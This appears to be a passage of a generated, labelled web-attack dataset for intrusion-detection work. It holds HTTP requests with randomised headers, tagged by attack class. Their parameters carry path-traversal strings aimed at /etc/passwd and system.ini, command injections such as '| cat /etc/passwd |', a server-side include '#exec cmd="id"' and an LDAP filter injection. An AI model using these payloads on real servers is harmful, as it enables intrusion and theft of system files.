GET /cYKJdnG9BQF_.mdb?hust=cdbHGrceztggASr&lrRmniesi=25&meHpyiihT3=oEtf&oesuaata=%3Es%27u&aecbbsuvSetundj=35&Ets8o0eseL=eQtU4zs4fb&Zboot.iniPZ=dihstyle&ma=r7T7fboR&ucpgrh1uhsr=bgsound%3CqAtpsu%7Crl+ir&s7TeebswljR=859&lelpi=%3Cform%2Bname%3Db3++%3E%3Cselect%2Bname%3D5++++%3Ehttp%3A%2F%2Fwww.3eswwo.com%2FtOv%2F%3F%3C%2Fselect%3E%3C%2Fform+%3E&4nhhaena=765925&qkwCgQVo=1463187 HTTP/1.1
Host: www.niYqt4i.net:4
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.4, koi8-r;q=0.5, windows-1255;q=0.4, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: o3eonv-a;q=0.4
Cache-Control: no-transform
Client-ip: 19.80.216.59
Cookie: adminJiyq=6575;rEPVFlWv=142
Cookie2: $Version="437"
Date: Sat, 04 Sep 04 19:47:59 CET
ETag: W/"6MRdR9@yj8zEbYgBk9"
Expect: mihtnn
From: dRkiaeue@o6si.cz
If-Modified-Since: Mon, 27 Oct 08 12:55:54 CET
If-Unmodified-Since: Thu, 16 Aug 07 21:31:50 CET
If-Match: *
If-None-Match: "lzarKL2_Hpv1XOj7"
If-Range: Wed, 04 Feb 09 04:56:13 UTC
Max-Forwards: 8
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Basic ZWRTMTp2VzJveWU=
Range: 944229-6,250-
Referer: /hji4o/aej1iyt/l18uafN/tterndi.cgi
TE: deflate,deflate;q=0.9,trailers
Trailer: Accept-Language
User-Agent: vi38yvsw2hfbs9sC
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5941x524
Via: uns/1.4 www.e9d3sefs.shtml, 0.9 245.82.51.138:5535
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47798
Start - Id: 36210
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: www.bwpatj.fr
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.0, iso-8859-8;q=0.7, euc-jp;q=0.5, iso-8859-4;q=0.8, iso-8859-1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 189.4.113.141
Cookie: 8t3=liuatRehoc6eN;HKQYVbinb-kAP=3305;mn5via=1;DFQPV=knoderughhCsaaajl;oTcr=6081375
Cookie2: $Version="32"
Date: Wed, 15 Sep 04 13:44:14 CET
ETag: "GO2S.faufqbFl7gf_ODS"
Expect: ctcvplr
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 3.7
Pragma: rbeehvu8='n'
Authorization: Basic ZGhvbjpuZHRmcno=
Range: 183-
Referer: http://vfonUu4y.com/t6smUn/wEaI1/Aoaatac4.msf
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: 5ata (t3lI-bX5; td6nIe7; o4TJI1g; o_Ntud; t9r3OuyFrr)
UA-Disp: 5541,8015,16
UA-OS: Win98
Via: 1.0 17.170.148.192, FTP/9.6 194.58.7.58
Upgrade: sst2oo/6.7, eatt/1.0
X-Serial-Number: 003494109

null

End - Id: 36210
Start - Id: 36369
class: PathTransversal
GET /fsH7mBC/acRIjt@J34LN/i8rlnwsnrfebi/hbQ4yOwFlrhdN_JQ/A1hynl8ea5bNSe8T7T/1GeZHZ3/m37_hzEujm1--5qW3/d0dY1ZwYPeFQ.tiff?g1on=om4wvxj_kB%40Z&rt=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: 124.125.223.15
Connection: keep-alive
Accept: image/*
Accept-Charset: windows-1254, euc-cn, iso-8859-8, iso-8859-4;q=0.1
Accept-Encoding: deflate, identity
Accept-Language: sodenat-bpn74N;q=0.0, pqvjenh-aekh;q=0.7, Nteddr-el;q=0.8
Cookie: iselsmiooanwgyt=803811973
Date: Thu, 22 Jun 06 04:27:03 CET
ETag: W/"lfz1sREhUPfHBw1Fcu"
If-Modified-Since: Sun, 14 Jan 07 06:28:59 CET
If-Unmodified-Since: Sun, 23 May 04 13:14:02 UTC
Max-Forwards: 151
MIME-Version: 7.0
Pragma: no-cache
Range: -31585,898409-624,686859-
Referer: /1sttdaa.js
User-Agent: wesrrf (dCGqGJ; d_QYkPa@o2; hrrqMa)
UA-Disp: 076,881,16
Transfer-Encoding: Wasoee
Upgrade: euej1b/5.8, Vey/5.0, dlleo/9.1

null

End - Id: 36369
Start - Id: 36598
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.alutyo.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.5, windows-1257, iso-8859-2;q=0.7, windows-1254
Accept-Encoding: *;q=0.5
Accept-Language: caHaabic-tiasaaxs, wa-EdSujl
Cache-Control: 7d='lvo'
Client-ip: 3.238.183.148
Cookie: nbhvsAsdmam=8
Cookie2: $Version="158"
Date: Sun, 15 Aug 04 18:25:07 UTC
ETag: W/"2ugy4E-E4UwJTbxpi1"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 28 Sep 06 10:32:44 CET
If-Unmodified-Since: Mon, 06 Dec 04 10:06:08 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 15 Jul 08 04:54:36 UTC
Max-Forwards: 365
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic OWlMdGVpaEk6OW44bndybnI=
Range: -23163,-7
Referer: /ciny/atkgmfd.php3
TE: gzip
Trailer: Max-Forwards
User-Agent: 2epWWwt8oX http://www.mq7relH.biz
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: uowA1/4.3 www.eAnw04.htm
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 749 www.Tr23iqts.html "ontttfrynef0akictteo" "Sun, 16 Nov 08 15:04:07 CET"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36598
Start - Id: 39468
class: SSI
GET /yuozLDLoahrd7raL/lapTtnulkherfrTau/4resnjhaagrcitUqr/eindarsaracOv/I@yojY6servicesLrOOi/ftTyfbQ@eB4I9jtk/hxD.al6Df.asmx?SdtElrocn=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&0BY.=liUwtstgoeks+e&ehi1rrxonlOl=ohr0far6ymLgoy&lqBytic=vtnrtrultyLiyvreve&uaY1nodeVhcVv4=ecdeleteRi HTTP/1.0
Host: 98.211.214.146
Connection: keep-alive
Accept: text/xml, application/rtf;q=0.3, audio/x-wav
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Date: Thu, 24 Dec 09 02:00:13 UTC
ETag: "rO7gTmojVrkGBkY0Awsd"
If-Modified-Since: Sat, 06 Oct 07 14:33:46 GMT
If-Unmodified-Since: Thu, 03 Nov 05 17:32:08 UTC
Referer: /ioe1o7.html
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 6.1; ty-sO; rv:0.1.2) Gecko/86438667

null

End - Id: 39468
Start - Id: 45455
class: PathTransversal
GET /nCcbb1iVYWsu/12dnrdntendothf4Ugii/ardTwyt/oFAHu.DDeqZe/3pne/tcat/bYMgk4fqdlYT2T7@wS/JIkNmSDlib5/deletefqQFdeleteRuQYQj/SGAh0/onnfhx@VxNK/WjandQ_.htm?rztdseyt=d2iuo2%2FW1%27eLh&ann=7075&smNzhaseE0=62885&fDmeohslesca=nnihdurtgxjtd&nm=ci0.%404x&e4Jl6-FZn@=d%3B&ntnqnaiMet=nOTg7&ed1=nneia&yb=Llrdn&rRedzcl=me+1&hq7z=It&Entloaet6bnna=%5CWINDOWS%5Csystem.ini&jcesxstq4gRo=sse7cenchildtiJa7j%5Cr&i6ec8enp1ash1=t9oaoO&loeTqherHinyfot=gadoy3+5 HTTP/1.0
Host: 128.95.190.2:186
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.2, x-mac-ce;q=0.2, windows-874, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: i='okqatao'
Client-ip: 12.216.103.106
Cookie: 0RjMpi=nrndim$=t;it=Xes;Et=)el0oIetae;hontorWani=225673;yias=60
Cookie2: $Version="1"
Date: Thu, 25 Sep 08 01:14:35 CET
ETag: "KhhxyjAs64YdLIzO"
Expect: 100-continue
From: wXuowl@fhcnteilt.be
If-Modified-Since: Thu, 31 Jul 08 06:23:31 GMT
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: "DC0vdWRkRIA2BEBp"
If-None-Match: "iYiinQsTzQeL28NRQ"
If-Range: Mon, 23 Nov 09 01:06:43 UTC
Max-Forwards: 8297
Pragma: Fx='wbl'
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: tesiN rlr8tzl=ur3Tiso
Range: -884,93-882862,81022-507
Referer: /ab3mOu3u/14Sehjdj/lnflHdOr/oRedmh9/qdrtf5.nsf
TE: trailers,trailers
Trailer: Host
User-Agent: SXikcb5ehd (e-Ji0z; hhnzXheh; hJ-_1ZC; cL6QqNOYyK; 8wpdTd5NG)
UA-Disp: 5444,1005,8
UA-OS: Windows 95
UA-Color: color8
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: gzip
Upgrade: a5a/5.3
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45455
Start - Id: 37043
class: LdapInjection
GET /lXEsZ3GGtH_P6m8wil0-/iboaz/eb7s/ryuzA0rI0171rqT/6kwmbXDO0XAKAXF/wAW/TXJryBfEW_@/eN1TAllOsVmE6g@Y.swf?imateIaoc=048223&zahi=%29%28++%7C%28+cn%3D*o+%27brien*++++%29%28mail%3D*o++%27brien*+%29++ HTTP/1.0
Host: 142.89.136.153
Connection: keep-alive
Accept: image/*;q=0.1
Accept-Charset: x-mac-ce;q=0.7, big5;q=0.9, koi8-r;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=7343
Client-ip: 188.212.178.172
Cookie: 6roossd=52482
Cookie2: $Version="6"
Date: Mon, 08 Jan 07 11:45:41 UTC
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: tJpe@htd4aess.biz
If-Modified-Since: Fri, 17 Mar 06 03:30:45 CET
If-Unmodified-Since: Mon, 05 Sep 05 10:55:01 CET
If-Match: *
If-None-Match: "jfyHLU6IO4Nk2Rqe"
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 319
MIME-Version: 3.6
Pragma: ac='szbrArde'
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic ZHR0THRsOnIxeTNlcg==
Range: -742236,5-8909,-634
Referer: http://www.eufne.org/etoneaga/tnifdaid.php4
TE: chunked,deflate
Trailer: Date
User-Agent: Mozilla/3.7 (compatible; Konqueror/4.2; Win98; 6dhktaet; tgIrttuen; 4satgpta6)
UA-CPU: StrongARM
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 2.1 201.140.223.201:942
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 659 www.4uoi.png "b04aynrye3u6tsecce" "Thu, 21 Jul 05 09:43:39 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37043
Start - Id: 45908
class: PathTransversal
GET /4TvT2UQ1/unmnon/qsVOuE/yerskhhe5r/insertJvarcVcT.shtml?llbreRiSsfnse=iWUmwt&QEo%urevalEIzAY=Lltdr24syeh%5Cs3y&dTtRei2r=rCmqDIA-G&DP._plJv=120835&yEEZvdiv-WB=o8cSaIBXs84hMeN&V13lL=rftoemlei3ua&aiHefh5r=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fdeesllan%2Fme%2Fdechli%2Fin.cgi&vBq7n=p63qA7g8Iyr-&wU28=lictEh9tt7oysaj1he&Jet0oOE=87522&h1dd0=e7ortxtitlake&dmriireetrx=092327205 HTTP/1.1
Host: 198.247.127.203:75
Connection: sntudt
Accept: audio/*;q=0.4, audio/basic;q=0.3, text/plain
Accept-Charset: x-mac-hebrew;q=0.6, iso-8859-6;q=0.3
Accept-Encoding: *
Accept-Language: penasO-zeczts
Cache-Control: min-fresh=4
Client-ip: 132.53.138.134
Cookie: hacsar8qmpmtt=or<uT$mphp6j+li&tma;sqs=03234472;aAn4t5c5tr=shdno
Cookie2: $Version="230"
Date: Thu, 10 Mar 05 10:38:42 CET
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 19 Mar 08 15:43:36 GMT
If-Unmodified-Since: Wed, 06 Apr 05 14:50:07 GMT
If-Match: *
If-None-Match: "EFZSVR096uCoBXqXt"
If-Range: *
Max-Forwards: 41
MIME-Version: 1.5
Pragma: of=a
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic N2loYWVudDo2aW5q
Range: 2-4458,00-
Referer: /farrS/kadhLita/steE/mRendwa/ptaen.bin
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 8.9; rb-w7; rv:7.1.1) Gecko/60895957
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/1.2 www.sasinhH.gif, 4.9 18.220.230.13, HTTP/6.0 43.247.58.168
Transfer-Encoding: deflate
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 7645574673
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45908
Start - Id: 43058
class: OsCommanding
POST /yCREEX09eJ1m9e3/mtiNCz/iw.GN.bin? HTTP/1.1
Content-Length: 243
Content-Language: l
Content-Encoding: compress
Content-Location: /kratr/escusdis.conf
Content-MD5: bGU4ZHBuZTVpb3Bib2V0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Feb 07 12:20:49 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: 198.69.200.186:80
Connection: close
Accept: application/x-tar, text/*;q=0.4, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.0, identity;q=0.6
Accept-Language: a-oyb;q=0.1, aIr-te1epaa
Cache-Control: no-transform
Client-ip: 106.223.101.99
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="6"
Date: Wed, 05 Sep 07 21:23:30 UTC
ETag: "CkQ3nAB.xUzhBzs5jox_"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Wed, 02 Nov 05 16:43:46 CET
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: "_eNPjrb3jxnMW0ToH"
If-Range: Thu, 19 Nov 09 12:17:54 UTC
Max-Forwards: 45
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Basic cGFrZVNsTzpvZWZ0MzR3aQ==
Range: -324,1-544,8-732
Referer: http://www.nasl.it/btnthttu/tlrxezh/dtndhs/ccsso.shtml
TE: deflate
Trailer: Accept
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 5.4; Vb-oL; rv:7.7.3) Gecko/68489170
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: qt8W/5.1 250.75.68.214, FTP/3.6 www.tinnw.jpeg
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 822 www.eio8o.jpg "ftuhtoaegstt66xnrce" "Tue, 28 Jul 09 22:26:56 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 13504238814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

osanLhm99eh=ni$&netppyadlir=s7C7nld617ll&mismoi=051&wVSqTR=85EO0IdfX&ntiUt7UElhze=wgetu<d&KBrmz=5Rwri@PsK&mez7ouaeeseshet=00964&soiroa=td&gtaeoor0ajn=| cat /etc/passwd |&.NQMconnectHwJjaccept2R=51609191&saeruSac=94842586&nuos=885

End - Id: 43058
Start - Id: 44535
class: OsCommanding
GET /bin/tn.pl/seite=;cat eshop.pl|? HTTP/1.0
Host: 13.196.207.62:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Cookie: rtoytmmtipdcs7y=315747;gejswdUnq=nht5;T4eeRowdamMof=698;xmy0allj7=rDaNXi
Date: Wed, 23 Jun 04 05:31:14 UTC
If-None-Match: "KAybswvL.7Fe-AqlS-C@"
Max-Forwards: 45
Authorization: Digest algorithm=MD5-sess
Referer: /ra3l/eftinc/pdetant/46pcusRs/Wbneds.cgi
TE: trailers,trailers,chunked
User-Agent: Mozilla/5.1 (compatible; MxutiF; WinNT; 1Imiqca; nvioo)
Via: FTP/6.7 248.191.227.202, euulu/3.2 www.daoi.shtml
Transfer-Encoding: gzip
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44535
Start - Id: 36105
class: PathTransversal
GET /op4U0bbT4S/x0/urmT6UcP3PBY@pT/hWiRSlhbSEvn/DiDPVD/8uXnw9sv1/sheEb15qsVft/etq/lY.exe?OnoEerehD=342132041&it0tesmIsm74a7=reunion&kcRdvbOp=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&oLemC8htiGda=a1iemabla&snrtne6loaeoIl=018 HTTP/1.0
Host: www.hwiYe.be
Connection: oeun
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: dHjatecj-tqtSirnA;q=0.1
Cache-Control: no-store
Client-ip: 100.85.62.104
Cookie: eeEeara=wllesi7;dl23tdq=OwhndaajtmMtl2;acrc=Adt
Cookie2: $Version="1"
Date: Tue, 25 May 04 02:01:36 CET
ETag: W/"END-QoI4eA7dNp1b9"
Expect: 100-continue
From: 7Croe@kumvreNv.biz
If-Modified-Since: Fri, 09 Jan 09 15:58:38 GMT
If-Unmodified-Since: Sun, 07 Aug 05 21:08:47 UTC
If-Match: *
If-None-Match: "xMeZS7p4aSgodpK58sc_"
If-Range: "ppBLUmU9fUJ9qZLp"
Max-Forwards: 5
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Basic YXRPaXNhOmV0YWE=
Range: 78-
Referer: /eemaeoIy/bgrvlgs/emra3.gif
TE: gzip;q=0.6,gzip;q=0.8,deflate
Trailer: Referer
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 2.0; rd-ru; rv:0.0.4) Gecko/04378127
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: 7.9 www.3gie.js, FTP/0.3 95.29.145.152, oistc/5.2 1.216.98.0
Transfer-Encoding: deflate
Upgrade: 9tr9iu/0.9
Warning: 505 www.e3nDj.jpeg:48661 "atsjlrarlaaa" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36105
Start - Id: 40926
class: SSI
GET /n8vy0NoKKluTQ/ccr57rd57NlH2A6Cv_Af/c_.zwnlctlKK/ef@yfcopyLdxjN.swf?spees9eab=7aeineq-wI%25d&meialdeeesu=%3C%21--++%23odbc+++++connect%3D%22z6t%2CeLe%2Cxlhe6%22+++++++statement%3D%22select+*+++++from++++ncT4t%22--%3E HTTP/1.0
Host: www.tsvlSot4th.cz
Connection: close
Accept: application/*;q=0.1, image/*;q=0.8, text/*
Accept-Charset: iso-8859-15, cp-932, cp-932;q=0.0, x-mac-arabic
Accept-Encoding: gzip
Accept-Language: to-ilneok, nue-rdetvo7, e-vodbm;q=0.2, hsn76o-03;q=0.5
Cache-Control: 0Rnts='sTp'
Client-ip: 124.10.91.136
Cookie: t6=rci;N2rG=2588075
Cookie2: $Version="5"
Date: Sun, 08 Feb 09 01:58:29 CET
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: ioOee@owoeu.be
If-Modified-Since: Wed, 03 Jan 07 20:20:50 GMT
If-Unmodified-Since: Sat, 05 May 07 06:00:20 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 15:11:14 GMT
Max-Forwards: 9867
MIME-Version: 4.2
Pragma: thii='w'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: -25
Referer: /gTce/uabue/5mFihvia.asp
TE: chunked;q=0.8
Trailer: Accept
User-Agent: 4Aaaz0/1.2.5
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: HTTP/4.8 www.Y1gmuueo.css, FTP/9.7 19.69.213.154
Transfer-Encoding: compress
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40926
Start - Id: 39935
class: SSI
POST /hV6jP-cDwT8aa/m2aVqSjVeVhnye/NG2ZzY4sbidC/H90group bysamF9_GoacceptgY/8AS/rHKc/aN43nD/@2replaceIvreplaceD/l0QDaUVVTIv2-cyo/rmeaeNelei9iT/jmy/e5lgG9Ailt.dll? HTTP/1.1
Content-Length: 132
Content-Language: Y6shuN3
Content-Encoding: compress
Content-Location: /ileuhn/oseionmS/0Meas/eeczo/aii5.tar
Content-MD5: b29tZW5zbm9pZXNubWNlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Oct 05 15:55:43 CET
Last-Modified: Fri, 30 Jun 06 07:25:29 CET
Host: 159.247.240.101
Connection: oeSslqqm
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-I8NofAyr, qs5t3W-h
Cache-Control: no-store
Client-ip: 241.54.246.2
Cookie: yb8detinTt=u$dppainbbetweennm$awsw>l;trcm0na7=nqIatao;ss7peto=94775;.F2QGND@rechoC7=818907768;et4lbott5=eIwfImJAs8ed;ybawtObacqnoFu=aYSd7I3z2S
Cookie2: $Version="17"
Date: Sun, 09 Oct 05 10:00:52 UTC
ETag: "904lqZNeUrGwrPUmWLi1"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Wed, 16 Jun 04 07:25:43 GMT
If-Unmodified-Since: Wed, 17 Dec 08 01:18:58 GMT
If-Match: *
If-None-Match: "RWI23uN5BkDjythnA_Js"
If-Range: Sun, 23 Apr 06 07:21:58 UTC
Max-Forwards: 733
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: Digest realm
Authorization: naadt uuhwd=aa77tee
Range: 065804-4,-22740,4181-
Referer: http://www.hzyt.ch/pe5n/1ejel/orceni/0evl8k/bhIzOj.htm
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: eYEs/2.8.1.9
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: 7.4 246.112.25.110:6
Transfer-Encoding: identity
Upgrade: awoh/8.2
Warning: 574 www.iiti.css "hNoose3Iaia" "Sat, 22 Sep 07 16:42:54 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naarssam1=2a<r7d9nph-mie &paFMnkiba.6=<! #<!--     #exec  cmd="id"-->&eueaTeHy=66851394&iokdrnreorfot=a>a7l 

End - Id: 39935
Start - Id: 45662
class: PathTransversal
GET /sq5sA/ldqng0vssNmg/ugenritxsw6Asteicm/5vcvh/eAUY7_BfUsEvvrdez_/72cSaPQY/seZunionAy9c1.png?dirrnehiS=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Feras%2Fllor%2Feles%2Fto.sh&vsewe1=26367&sbl=nYtitDestv+a3Tnp&sh3qL=scriptenAcvct&e0chQdet=bodyrr+l&LfMls@.LlogYd4=u3S7sr&n6totpNDdft=eSeusrerhtuare&Cdnnwstonvpaeu=sem%3AgnDnXep&9LzQmr=74&oIdRweDodadtsml=iemeHeSib&tnnae=nrel&taHiedao=hdfhRlWe&Hirb3Q=75658 HTTP/1.0
Host: 200.76.188.186:80
Connection: odtrae
Accept: */*;q=0.0
Accept-Charset: windows-1250;q=0.0, windows-1257, iso-8859-6;q=0.5
Accept-Encoding: 
Accept-Language: 16s-a5ghemva;q=0.6
Cache-Control: max-stale=6
Client-ip: 189.129.104.202
Cookie: soeatiyen3tf4m=);dsre1thtsoeSe=60792879;esasesdisiv=64672;ernueecodz0d=senn
Cookie2: $Version="46"
Date: Fri, 22 Jun 07 19:11:47 UTC
ETag: W/"7x6zWK4vVBctAGUO"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Thu, 27 Jul 06 19:38:34 CET
If-Unmodified-Since: Tue, 14 Apr 09 14:34:22 GMT
If-Match: "OybkXrK6jR0fRbcAXiru"
If-None-Match: *
If-Range: "dCi832-IZbJ8.O.ok6l"
Max-Forwards: 113
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest qop=teco
Range: 92916-
Referer: /l0hN/ts3i/e8teic/Qapy/SFdiyrg.jsp
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: erlhSsEche6wtEvdhol
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: deflate
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 291 www.olf39o.jpg "uhsenbent4l" "Tue, 24 Jan 06 02:46:29 UTC"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45662
Start - Id: 44025
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.Oeeiea0re.de
Connection: keep-alive
Accept: image/png;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: r7peii-ubo, t-ahdwna;q=0.9, aeb-ps6ie;q=0.3, taCim4-oae, ybb-tt3Lt;q=0.5
Cache-Control: only-if-cached
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Sun, 03 Jun 07 13:00:04 GMT
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: oOei72
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sun, 30 Mar 08 04:11:40 UTC
If-Match: *
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: Sun, 28 Feb 10 21:17:34 GMT
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: Basic dGh0Y25hYTo4dGlvU3o=
Range: 67-764741,470518-20,3-202913
Referer: /eb1n/naNatnrl/ande/enas/stfsoit.dll
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: kptwsgjE
UA-CPU: PowerPC
UA-Disp: 008,2196,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
